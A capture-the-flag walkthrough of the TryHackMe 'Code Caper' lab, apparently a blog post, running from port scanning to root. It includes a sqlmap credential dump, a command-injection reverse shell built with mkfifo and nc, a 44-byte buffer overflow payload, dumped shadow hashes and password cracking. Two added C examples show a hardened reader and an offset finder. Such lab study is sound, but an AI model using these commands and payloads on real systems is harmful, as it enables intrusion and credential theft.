TryHackMe: The Code Caper writeup !!


YouTube walkthrough:


Investigating hosts

First, press Deploy to get the target's IP address and find the open ports with nmap. Adding the -A option gives a more detailed scan, but it takes time, so leave it off at first and just find out which ports are open.

$ sudo nmap 10.10.194.163 -p1-1000 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 20:49 JST
Nmap scan report for 10.10.194.163
Host is up (0.31s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 403.50 seconds

Web page research

Since a web server is running, I'll run a content scan with gobuster to see what kind of pages exist.
Any wordlist will do, but for a first pass I personally recommend /usr/share/wordlists/dirb/common.txt: it ships with Kali, it is broadly applicable, and it is small enough that the scan does not take too long.

$ gobuster dir -x html,txt,php -u http://10.10.194.163 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.194.163
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt,php
[+] Timeout:        10s
===============================================================
2020/05/19 21:05:04 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)

.............................................

/administrator.php (Status: 200)

.............................................

===============================================================
2020/05/19 21:13:15 Finished
===============================================================

Opening /administrator.php, I found a login form.
Against a login form, let's check whether password cracking or SQL injection can be used. Password cracking can be time-consuming, and at this point we have no user information to work with, so we'll investigate whether SQL injection is possible instead.
It seems that sqlmap is not allowed in the OSCP exam, but this time I'll use it for the sake of simplicity.

$ sqlmap -u http://10.10.194.163/administrator.php --dump --forms --level=5 --risk=3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:25:14 /2020-05-19/

[21:25:15] [INFO] testing connection to the target URL
[21:25:15] [INFO] searching for forms
[#1] form:
POST http://10.10.194.163/administrator.php
POST data: username=&password=
do you want to test this form? [Y/n/q] 
> 
Edit POST data [default: username=&password=] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] 

...............................................

Database: users
Table: users
[1 entry]
+----------+------------+
| username | password   |
+----------+------------+
| ******** | ********** |
+----------+------------+

[21:44:45] [INFO] table 'users.users' dumped to CSV file '/xxxx/yyyyyy/.sqlmap/output/10.10.194.163/dump/users/users.csv'
[21:44:45] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/xxxx/yyyyyy/.sqlmap/output/results-05192020_0925pm.csv'

[*] ending @ 21:44:45 /2020-05-19/

Logging in with these credentials shows a page where you can enter a command.
Try commands like id or ls and check the output; this is an obvious command injection page.
So we'll use this command injection to get in with a reverse shell.
First, start a netcat listener on the attacking machine.

kali:~$ nc -lvp 4444

Next, there are various ways to spawn a reverse shell from the command injection page. netcat -e /bin/sh is the simplest, but the -e option is often not supported for security reasons.
This time I got the reverse shell with the following mkfifo technique.

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc (Kali's IP address) 4444 >/tmp/f

Running this command gives you a shell on the listener.

kali:~$ netcat -lvp 4444
listening on [any] 4444 ...
10.10.194.163: inverse host lookup failed: Unknown host
connect to [10.9.5.213] from (UNKNOWN) [10.10.194.163] 53026
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Information gathering (post-intrusion)

Let's look for useful files.
Directories such as /home, /var and /opt can be searched with commands like tree, find and ls, but this time the password was placed close to the directory we landed in, so we quickly found a suspiciously named folder that seemed meant to be hidden.
Try your best to find it.

Opening the file, you'll find a password inside. Recall from the initial nmap scan that ssh is open; that is where this password can be used.
Use the following command to get a clear picture of which users exist, then connect over ssh and get in.

$ cat /etc/passwd | grep -v "nologin" | grep -v "false" | grep -v "sync"
root:x:0:0:root:/root:/bin/bash
papa:x:1000:1000:qaa:/home/papa:/bin/bash
pingu:x:1002:1002::/home/pingu:/bin/bash
kali:~$ ssh pingu@10.10.194.163
The authenticity of host '10.10.194.163 (10.10.194.163)' can't be established.
ECDSA key fingerprint is SHA256:jAGdoIBGaTVGRC6n/NXl76tRfHyed/hhboT1IvCPO84.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.194.163' (ECDSA) to the list of known hosts.
pingu@10.10.194.163's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Mon Jan 20 14:14:47 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

pingu@ubuntu:~$ id
uid=1002(pingu) gid=1002(pingu) groups=1002(pingu),4(adm),24(cdrom),27(sudo),30(dip)
pingu@ubuntu:~$ whoami
pingu
pingu@ubuntu:~$ sudo -l
[sudo] password for pingu: 
Sorry, user pingu may not run sudo on ubuntu.

Information gathering (elevation of privilege)

The next thing to do is privilege escalation. I tried checking sudo privileges with sudo -l, but gave up on that route since pingu doesn't seem to have any sudo rights.
Next, we'll use an information-gathering tool. In a previous post I introduced linpeas.sh, but this time let's use LinEnum.
The flow is as follows.
- Download LinEnum on the Kali side
- Start a SimpleHTTPServer on the Kali side
- wget it from Kali on the target machine
- Run it

kali:~$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
kali:~$ python -m SimpleHTTPServer 9999
pingu@ubuntu:~$ wget http://(Kali's IP address):9999/LinEnum.sh

In the output of tools like this, it's a good idea to look first at the SUID binaries owned by root.
And indeed, an interesting-looking binary turned up.

..................

-e \e[00;31m[-] SUID files:\e[00m
-r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root

..................

Running this binary and typing a command doesn't appear to do anything at first glance, but it looks like it can be put to use.

Exploit

Looking around for more information on whether anything can be done with it, I noticed a .gdbinit in pingu's home directory, which suggests the intended route, so let's examine /opt/secret/root in gdb.

pingu@ubuntu:~$ gdb -q /opt/secret/root
pwndbg: loaded 178 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from /opt/secret/root...(no debugging symbols found)...done.
pwndbg> i func
All defined functions:

Non-debugging symbols:
0x08048330  _init
0x08048370  setgid@plt
0x08048380  system@plt
0x08048390  __libc_start_main@plt
0x080483a0  setuid@plt
0x080483b0  __isoc99_scanf@plt
0x080483d0  _start
0x08048400  __x86.get_pc_thunk.bx
0x08048410  deregister_tm_clones
0x08048440  register_tm_clones
0x08048480  __do_global_dtors_aux
0x080484a0  frame_dummy
0x080484cb  shell
0x08048504  get_input
0x08048521  main
0x08048550  __libc_csu_init
0x080485b0  __libc_csu_fini
0x080485b4  _fini 

First I listed the functions. A function called shell looks suspicious. I'll briefly disassemble main, shell and get_input.

pwndbg> disassemble main
Dump of assembler code for function main:
   0x08048521 <+0>:     lea    ecx,[esp+0x4]
   0x08048525 <+4>:     and    esp,0xfffffff0
   0x08048528 <+7>:     push   DWORD PTR [ecx-0x4]
   0x0804852b <+10>:    push   ebp
   0x0804852c <+11>:    mov    ebp,esp
   0x0804852e <+13>:    push   ecx
   0x0804852f <+14>:    sub    esp,0x4
   0x08048532 <+17>:    call   0x8048504 <get_input>
   0x08048537 <+22>:    mov    eax,0x0
   0x0804853c <+27>:    add    esp,0x4
   0x0804853f <+30>:    pop    ecx
   0x08048540 <+31>:    pop    ebp
   0x08048541 <+32>:    lea    esp,[ecx-0x4]
   0x08048544 <+35>:    ret    
End of assembler dump.
pwndbg> disassemble get_input
Dump of assembler code for function get_input:
   0x08048504 <+0>:     push   ebp
   0x08048505 <+1>:     mov    ebp,esp
   0x08048507 <+3>:     sub    esp,0x28
   0x0804850a <+6>:     sub    esp,0x8
   0x0804850d <+9>:     lea    eax,[ebp-0x28]
   0x08048510 <+12>:    push   eax
   0x08048511 <+13>:    push   0x80485ec
   0x08048516 <+18>:    call   0x80483b0 <__isoc99_scanf@plt>
   0x0804851b <+23>:    add    esp,0x10
   0x0804851e <+26>:    nop
   0x0804851f <+27>:    leave  
   0x08048520 <+28>:    ret    
End of assembler dump.
pwndbg> disassemble shell
Dump of assembler code for function shell:
   0x080484cb <+0>:     push   ebp
   0x080484cc <+1>:     mov    ebp,esp
   0x080484ce <+3>:     sub    esp,0x8
   0x080484d1 <+6>:     sub    esp,0xc
   0x080484d4 <+9>:     push   0x3e8
   0x080484d9 <+14>:    call   0x80483a0 <setuid@plt>
   0x080484de <+19>:    add    esp,0x10
   0x080484e1 <+22>:    sub    esp,0xc
   0x080484e4 <+25>:    push   0x3e8
   0x080484e9 <+30>:    call   0x8048370 <setgid@plt>
   0x080484ee <+35>:    add    esp,0x10
   0x080484f1 <+38>:    sub    esp,0xc
   0x080484f4 <+41>:    push   0x80485d0
   0x080484f9 <+46>:    call   0x8048380 <system@plt>
   0x080484fe <+51>:    add    esp,0x10
   0x08048501 <+54>:    nop
   0x08048502 <+55>:    leave  
   0x08048503 <+56>:    ret    
End of assembler dump.
 

Looking at each of them: main calls get_input, which reads the input. The shell function calls system. Since shell is not part of the flow that main executes, the idea is presumably to use something like a buffer overflow to redirect control to shell, or to start a shell through system. Inside shell, whatever is stored at address 0x80485d0 is pushed on the stack and passed to system as its argument, so let's display what is there.
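As an added example that is not part of the writeup or the room's binary, here is a C reconstruction of what the get_input disassembly implies (a 40-byte stack buffer at ebp-0x28 filled by scanf with no length limit; the format string "%s" at 0x80485ec is an assumption, since the page never prints it), next to a bounded reader that would close the hole, and a helper that derives the distance from the buffer to the saved return address from the frame layout (0x28 bytes of buffer plus the 4-byte saved ebp).

```c
/* Added example, not code from the writeup: what the get_input disassembly
 * implies, beside a bounded replacement. Assumption (not confirmed by the
 * page): the format string at 0x80485ec is "%s". */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x28        /* lea eax,[ebp-0x28]: buffer is 40 bytes below saved ebp */
#define SAVED_EBP_SIZE 4     /* 32-bit frame: saved ebp sits directly above the buffer */

/* Inferred shape of the vulnerable reader: scanf("%s") has no length limit,
 * so input longer than 40 bytes runs over saved ebp and the return address.
 * Shown for illustration only; nothing here calls it. */
void get_input_vulnerable(void)
{
    char buf[BUF_SIZE];
    if (scanf("%s", buf) != 1)
        buf[0] = '\0';
}

/* Distance from the start of the buffer to the saved return address:
 * buffer (0x28) + saved ebp (4) = 44, the value cyclic -l and
 * pattern_offset.rb report in the writeup. */
size_t return_address_offset(size_t buf_offset_from_ebp)
{
    return buf_offset_from_ebp + SAVED_EBP_SIZE;
}

/* Hardened reader: fgets never stores more than cap bytes, so the frame
 * cannot be overwritten however long the input is. Returns the number of
 * characters kept (without the terminator), or -1 on EOF/error. An over-long
 * line is drained so the remainder is not misread as a second command. */
int get_input_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Feeds a constructed string through the bounded reader via an ISO C
 * temporary stream standing in for stdin. */
int read_from_string(const char *input, char *dst, size_t cap)
{
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fputs(input, in);
    rewind(in);
    int n = get_input_bounded(dst, cap, in);
    fclose(in);
    return n;
}

/* Same, with the binary's 40-byte buffer; returns how many bytes were kept. */
int bounded_kept_length(const char *input)
{
    char buf[BUF_SIZE];
    return read_from_string(input, buf, sizeof buf);
}

int main(void)
{
    char long_input[200];                    /* constructed over-long input */
    memset(long_input, 'A', sizeof long_input - 1);
    long_input[sizeof long_input - 1] = '\0';

    printf("offset to return address: %zu\n", return_address_offset(BUF_SIZE));
    printf("bounded reader kept %d of %zu bytes\n",
           bounded_kept_length(long_input), strlen(long_input));
    return 0;
}
```

The bounded variant keeps at most 39 characters plus the terminator, so the 44-byte offset is never reachable from input; compiling with the stack protector and not installing the binary setuid would be the additional layers a maintainer would add, independent of the read itself.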

pwndbg> x/s 0x80485d0
0x80485d0:      "cat /var/backups/shadow.bak"

It looks like a backup of /etc/shadow. Since /etc/shadow stores the password hashes, reading this file may let us crack the passwords of papa and root. So let's redirect control to the shell function. To do this with a buffer overflow, we first need to find the offset: how many bytes of input the program takes before the return address is overwritten and it segfaults. The principles of buffer overflows are omitted here.

How to find the offset (1)

In pwndbg, the offset can be found with the cyclic command.

pwndbg> r < <(cyclic 50)
Starting program: /opt/secret/root < <(cyclic 50)

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────
 EAX  0x1
 EBX  0x0
 ECX  0x1
 EDX  0xf771c87c (_IO_stdfile_0_lock) ◂— 0
 EDI  0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
 ESI  0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
 EBP  0x6161616b ('kaaa')
 ESP  0xff9ed260 ◂— 0xf700616d /* 'ma' */
 EIP  0x6161616c ('laaa')
───────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────
Invalid address 0x6161616c

───────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────
00:0000│ esp  0xff9ed260 ◂— 0xf700616d /* 'ma' */
01:0004│      0xff9ed264 —▸ 0xff9ed280 ◂— 0x1
02:0008│      0xff9ed268 ◂— 0x0
03:000c│      0xff9ed26c —▸ 0xf7581637 (__libc_start_main+247) ◂— add    esp, 0x10
04:0010│      0xff9ed270 —▸ 0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
... ↓
06:0018│      0xff9ed278 ◂— 0x0
07:001c│      0xff9ed27c —▸ 0xf7581637 (__libc_start_main+247) ◂— add    esp, 0x10
─────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────
 ► f 0 6161616c
   f 1 f700616d
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Program received signal SIGSEGV (fault address 0x6161616c)
pwndbg> cyclic -l 0x6161616c
44


How to find the offset (2)

Method (1) is what the TryHackMe guidance shows, but I was absorbed in solving the box and didn't look at the guidance, so I did it the following way. If pwndbg is available, the method above is more convenient.

kali:~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A (← copy and paste this)

pingu@ubuntu:~$ gdb /opt/secret/root -q
pwndbg: loaded 178 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from /opt/secret/root...(no debugging symbols found)...done.
pwndbg> run
Starting program: /opt/secret/root 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x35624134 in ?? ()

kali:~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x35624134
[*] Exact match at offset 44
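Both methods do the same thing: feed in a pattern in which every 4-byte window is unique, read the value that landed in EIP, and look up where those 4 bytes (in little-endian memory order) sit in the pattern. As an added example, not code from the writeup, pwndbg or Metasploit, here is a C program that generates both pattern styles and performs that lookup; the crash values 0x6161616c and 0x35624134 are the ones from the two sessions above, and both resolve to 44.

```c
/* Added example (not code from the writeup, pwndbg or Metasploit): builds the
 * two pattern styles used above and recovers the offset from a crash value.
 * The faulting EIP is decoded as little-endian, which is what
 * `cyclic -l 0x6161616c` and `pattern_offset.rb -q 0x35624134` do. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define MAX_PATTERN 4096

/* --- style 1: pwntools-style de Bruijn sequence, order 4 over a-z --- */
static const char ALPHABET[] = "abcdefghijklmnopqrstuvwxyz";
#define ALPHA_LEN 26
#define SUBSEQ 4

struct db_state { char *out; size_t len, cap; int a[SUBSEQ + 1]; };

/* FKM algorithm: concatenated Lyndon words form a de Bruijn sequence, so
 * every 4-byte window is unique. Output stops at cap bytes like cyclic(n). */
static void db_rec(struct db_state *s, int t, int p)
{
    if (s->len >= s->cap) return;
    if (t > SUBSEQ) {
        if (SUBSEQ % p == 0)
            for (int j = 1; j <= p && s->len < s->cap; j++)
                s->out[s->len++] = ALPHABET[s->a[j]];
        return;
    }
    s->a[t] = s->a[t - p];
    db_rec(s, t + 1, p);
    for (int j = s->a[t - p] + 1; j < ALPHA_LEN; j++) {
        s->a[t] = j;
        db_rec(s, t + 1, t);
    }
}

/* Writes the first n bytes of the sequence into out and NUL-terminates. */
void cyclic_pattern(char *out, size_t n)
{
    struct db_state s = { out, 0, n, {0} };
    db_rec(&s, 1, 1);
    out[s.len] = '\0';
}

/* --- style 2: Metasploit pattern_create.rb: Upper-lower-digit triples --- */
void msf_pattern(char *out, size_t n)
{
    size_t len = 0;
    for (char u = 'A'; u <= 'Z' && len < n; u++)
        for (char l = 'a'; l <= 'z' && len < n; l++)
            for (char d = '0'; d <= '9' && len < n; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && len < n; i++)
                    out[len++] = trip[i];
            }
    out[len] = '\0';
}

/* The 4 bytes that landed in EIP, in memory order (least significant byte
 * first), located in the pattern. Returns -1 if they are not in it, e.g.
 * when the crash value did not come from the pattern at all. */
long pattern_offset(const char *pattern, uint32_t eip)
{
    char needle[5] = { (char)(eip & 0xff), (char)((eip >> 8) & 0xff),
                       (char)((eip >> 16) & 0xff), (char)(eip >> 24), 0 };
    const char *hit = strstr(pattern, needle);
    return hit ? (long)(hit - pattern) : -1;
}

/* Wrappers mirroring the two tool invocations in the writeup. */
long cyclic_crash_offset(uint32_t eip, size_t pattern_len)
{
    static char buf[MAX_PATTERN];
    if (pattern_len >= MAX_PATTERN) pattern_len = MAX_PATTERN - 1;
    cyclic_pattern(buf, pattern_len);
    return pattern_offset(buf, eip);
}

long msf_crash_offset(uint32_t eip, size_t pattern_len)
{
    static char buf[MAX_PATTERN];
    if (pattern_len >= MAX_PATTERN) pattern_len = MAX_PATTERN - 1;
    msf_pattern(buf, pattern_len);
    return pattern_offset(buf, eip);
}

int main(void)
{
    char p[101];
    msf_pattern(p, 100);
    printf("%s\n", p);   /* same string as pattern_create.rb -l 100 above */
    printf("cyclic offset: %ld\n", cyclic_crash_offset(0x6161616c, 50));
    printf("msf offset:    %ld\n", msf_crash_offset(0x35624134, 100));
    return 0;
}
```

The little-endian decode is the step people get wrong by hand: 0x6161616c is the bytes 6c 61 61 61, i.e. "laaa" as pwndbg showed in the EIP line, not "aaal", and 0x35624134 is "4Ab5". A value that is not found in the pattern (returned as -1) means EIP was not overwritten by the input directly, and the crash needs a different explanation.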

Either way, we now know the offset is 44.
Let's use this offset to redirect control to the shell function.
From the function list, the address of shell is 0x080484cb; taking little-endian byte order into account, enter a command like the following:

pingu@ubuntu:~$ python -c 'print("A"*44+"\xcb\x84\x04\x08")' | /opt/secret/root
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
Illegal instruction

Now we have the hashes.

Hash cracking

Write root's hash $6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck. to a file (single quotes, so the shell does not expand the $ signs inside the hash).

$ echo '$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.' > hash

The guidance introduced hashcat, but I used John the Ripper.

$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
*******        (?)
1g 0:00:03:32 DONE (2020-05-20 19:29) 0.004697g/s 1126p/s 1126c/s 1126C/s lovelife07..lossims
Use the "--show" option to display all of the cracked passwords reliably
Session completed

A password appeared as ******.
Now that we know the password, we can become root.

pingu@ubuntu:~$ su
Password: 
root@ubuntu:/home/pingu# id
uid=0(root) gid=0(root) groups=0(root)

Closing

That's all there is to it.
It was a very fun machine to do personally because it required a certain understanding from the web to the assembly.
I hope you will try it out.
